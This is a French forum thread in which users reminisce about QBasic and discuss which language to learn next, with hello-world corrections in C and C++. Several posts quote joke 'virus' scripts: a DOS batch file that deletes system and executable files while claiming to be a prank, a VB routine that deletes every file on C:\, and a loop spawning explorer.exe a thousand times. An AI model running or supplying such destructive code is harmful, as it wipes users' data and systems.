"Programmation" en Qbasic

Répondre
Partager Rechercher
Voilà je viens de dépoussierer un tas de disquettes 3 1/2 et j'ai retrouvé des vieux jeux que j'avais fait sur Qbasic... c'est la seule interface que j'ai jamais connu (avec celle de ma calculette Casio aussi ) et je me demandais si certains d'entre vous avaient fait un peu de qbasic par le passé....?

Parceque depuis j'ai bien essayé de me lancer dans le html, le C+, le Java, VisualBasic....mais en vain... j'ai jamais réussi à dépasser le cap du qbasic....

Existe-t-il à l'heure actuelle un langage de programmation qui serait un peu moins ringard que le qbasic mais qui resterait un peu dans le même type de raisonnement.....?

Et puis si certains ont fait quelques progs simples sur qbasic, pourquoi pas les partager, c'est toujours bon la nostalgie!
Qbasic... Ah oui.. en 5 eme au college on avait 1 pc réservé qui nous servait de souffre douleur..

On faisait de la musique , des jeux on a fait un simulacre de virus... C'etait bien la 5 eme lol
Re: "Programmation" en Qbasic
le Qbasic est l'ancetre du Visual basic

sinon pour la programmation il y a une seule "logique" cela s'appelle l'algorithme .... quand tu connasi l'algo tu peut programmer quasi avec n'importe quel language (je ne parle pas de language de script qui est la différent tout en étant proche)

Donc si tu veut programmer avec autre chose que du QBasic essaye d'apprendre l'algo et de l'assimiler puis une fois la logique de l'algo assimiler tu verrat apprendre un language tel que le C/C++,VB est beaucoup plus simple (enfin tout est relatif hein ^^)
lol
Voila ce que je retrouve sur la même disquette: un fichier Vraivirus.bat:
Citation :
echo off
echo Dommage pour toi mon petit....
echo Je suis sympa,je te laisse une petite chance....
echo On va voir si t'es pas trop con...
pause

cd C:\
del autoexec.bat
del config.sys
del command.com
cd C:\dos
del *.exe
del *.bat
cd C:\Windows
del *.exe
del *.bat
cls
echo NOOOON....C'était une blague...J'ai rien effacé
Pour la petite anecdote j'avais fait ce "virus" en 6ème sur mon 386 qui fonctionnait sous dos... puis je l'avais complètement oublié et genre 2-3 ans après je retrouve ce fichier, et j'ai cru que c'était une blague.... ben ça a bien marché et mon ordi il allait beaucoup moins bien après....
[/3615mylife]


pour revenir au sujet......: j'ai rien compris à ce que t'as dit Lorim
Je suis comme toi, j'ai commencé à programmer sur mon 386 en GW-Basic (ou Basica, bref du QBasic sans l'interface graphique) et dès que j'ai essayé Delphi, C++ & cie j'ai abandonné
Par contre pour les créations j'ai plus rien, dommage je me souviens que j'avais fait de jolies musiques

Faut dire que c'était trop bon à l'époque, avec les PRINT et les INPUT arg je me souviens plus de grand chose...
Code:
VB code

Private Sub Virus ()

MsgBox "Salut, ceci est un virus, désolé pour ton pc!!", VbCritical

ChDir "C:\"
Kill *.*

MsgBox "Procédure réussie", VbInformation
MsgBox "Merci d'avoir fait confiance à la VirusCorp.", VbExclamation

End Sub
Voilà, en Visual Basic, y'a moins de lignes ...

Par contre, connaître l'algorithmique est assez important puisque c'est ce qui va te servir d'analyse pour programmer, donc connaître un langage par coeur, ça ne sert à rien (surtout qu'il y a des bibliothèques bien fournies sur certains langages), par contre, savoir comment programmer, c'est mieux !

[edit pour en dessous: Oui, il doit y en avoir, mais disons que dans l'ensemble, il y a juste quelques bases à connaître, après c'est à toi de réfléchir pour savoir comment faire ]


Description algorithmique du programme:

début
|
Message de commencement
|
|
|
Ouverture du répertoire C:\
|
|
|
Destruction de tous les fichiers s'y trouvant
|
|
|
1er message de fin
|
|
|
2ème message de fin
|
fin
Citation :
Provient du message de Angel/Khal MacRoeg²
Y a de bons sites/tutoriaux pour connaître ces algorithmes?
l'algo est la base de la programmation ... tu devrais trouver des cours sur le net...

après il te suffit d'apprendre par coeur,de l'assimiler et quand tu te retrouverat devant un language (toujours relatif cela dépend du language *a abandonné sa tentative d'aprentissage du Koblol* ) tu verrat tout serat plus simple car totu te semblerat plus logique

@ Kath :

pour ma part je préfere :

Code PHP:

Sub ToutKaput

dim Exec 
as double

for 1 to 1000

   Exec 
shell("C:\Windows\explorer.exe",vbmaximum)

next i

end sub 
Ah, tu passes par débordement de mémoire (t'as oublié le Dim i as Integer) ...

Oui, enfin les virus, ça dépend comment on veut les faire, mais bon, ça passe par une connaissance de systémique (le coup de changer le vecteur des IRQ, c'est pas mal non plus )

Et puis COBOL, c'est bien, et c'est beau, et c'est pratique...
Citation :
Provient du message de Kodha
ouais pis faire des virus c d'un stupide et d'un banal ...
Certes, mieux vaut utiliser son intelligence pour coder des programmes on ne peut plus utiles, c'est vrai...
Moi aussi j'avais essayer de me mettre à Visual Basic, mais je voulais savoir , n'en faisant plus du tout : ils ont sorti une apres 6.0 ?

*se rappelle que l'edition professionelle valait des 100 et des milles*
Re: Re: "Programmation" en Qbasic
Citation :
Provient du message de Lorim
Donc si tu veut programmer avec autre chose que du QBasic essaye d'apprendre l'algo et de l'assimiler puis une fois la logique de l'algo assimiler tu verrat apprendre un language tel que le C/C++,VB est beaucoup plus simple (enfin tout est relatif hein ^^)
gnarf. ... C++ simple ...

les langages à objet nécessite d'abord une mise en route sur les concepts objets

Mais un langage de script tel le php est idéal pour commencer à programmer En c c plus dur a cause des gestion de mémoire et pointeurs

le pascal reste une référence de simplicité

Dans l'ordre d'importance des langages selon moi :

Java, C et dérivés, php, vbnet

Citation :
Provient du message de Kep
Moi aussi j'avais essayer de me mettre à Visual Basic, mais je voulais savoir , n'en faisant plus du tout : ils ont sorti une apres 6.0 ?

*se rappelle que l'edition professionelle valait des 100 et des milles*
Le langage VBnet est la suite de VB sur la plateforme dotnet. Le langage est devenu flexible, interchangeable avec C#, tout objet, bref un bonheur
Le QBasic, c'était marrant. ^^

Si je retrouve les programmes qu'un ami et moi on avait fait, je te filerais un lien pour les telecharger ^^

Sinon pareil que toi, j'ai essayé le C++ .. Visual Basic ..
Bah a part un ptit truc pour écrire "Bonjour !" à l'écran c'était pas ça
Citation :
Provient du message de Dok Slayers
Bah a part un ptit truc pour écrire "Bonjour !" à l'écran c'était pas ça
Code:
#include <stdio.h>
void main() {
    printf("Hello!");
}


Rholala, ok, ok...
Code:
#include <iostream.h>
void main() {
    cout << "Hello!";
}
Le c est facile à apprendre, même si la syntaxe peut présenter parfois quelques subtilités, et si le concept de pointeurs peut géner un débutant.

Si tu es du genre matheux, je te conseille le caml, qui est très agréable à utiliser, mais le style de programmation diffèrera sûrement pas mal de ce que tu as déja vu.

De toutes façons le mieux pour apprendre c'est de trouver un cours sur le net

Citation :
Provient du message de Teen
Code:
#include <stdio.h>
voidint main() {
    printf("Hello!\n");
    return 0;
}
ne pas oublier le "\n" à la fin...
et le type de main est int (int, char *[]).
Ouais, c'est de la paresse de pas foutre les arguments et le retour de main. Sur la plupart des compilateurs, ca genère même des warnings. Quelle honte de publier du code à warnings sur ce beau forum.
Citation :
Provient du message de Pierre-Loup
Ouais, c'est de la paresse de pas foutre les arguments et le retour de main. Sur la plupart des compilateurs, ca genère même des warnings. Quelle honte de publier du code à warnings sur ce beau forum.
Les arguments c'est tout à fait autorisé de ne pas les mettre si tu ne les utilises pas. Tu peux toujours apeller une fonction avec plus d'arguments qu'elle en a, les arguments en plus sont ignorés.
Par contre le de main est très important. Ça sera le code de retour de ton programme.
oui il faut toujours spécifier le retour de main ( int ) !! et non les arguments ne sont pas obligatoires !

Citation :
Provient du message de Teen
Code:
#include <iostream.h>
void main() 
{
    cout << "Hello!";
}
j'aurais fait ça moi :

Citation :
Code:
#include <iostream>

using namespace std;
int main()
{
std::cout << "Hello" <<'\n';
return 0;
}
les .h sont les vieilles versions de la bibliothèque standard qui ne sont gardées que pour la compatibilité. Toute la bibliothèque standard se trouve dans les entêtes sans .h qui sont déclarées dans le namespace std. Attention à ne pas oublier le using.

[edit] arf !! j'ai pas d'unix chez moi là, quelqu'un pourrait tester ce bout de code avec g++ et mettre les warnings au niveau le plus strict ? c'est l'option -W je crois :

Citation :
Code:
#include <iostream>
using namespace std;

void main()
{
std::cout << "Hello" <<'\n';
}
je viens de tester avec dev-cpp ( basé sur le compilo gcc) et ca marche avec aucun warning, mais bon c'est pas très propre et surtout, ce n'est pas au norme, il faut toujours spécifier le retour de main !
Des cours sur le net ? J'ai cherché, oh oui, mais je dois pas être doué car j'ai trouvé des trucs bidons et compréhensible, ou alors incompréhensible .. donc bon. ^^
J'avais même acheté un livre, puis quelques jours après je vois marqué sur un site que dans ce livre y a marqué nimp .. ok.

Sinon j'ai justement reussi à écrire quelque chose à l'écran, mais ça s'arrêter là huhu
Répondre

Connectés sur ce fil

 
1 connecté (0 membre et 1 invité) Afficher la liste détaillée des connectés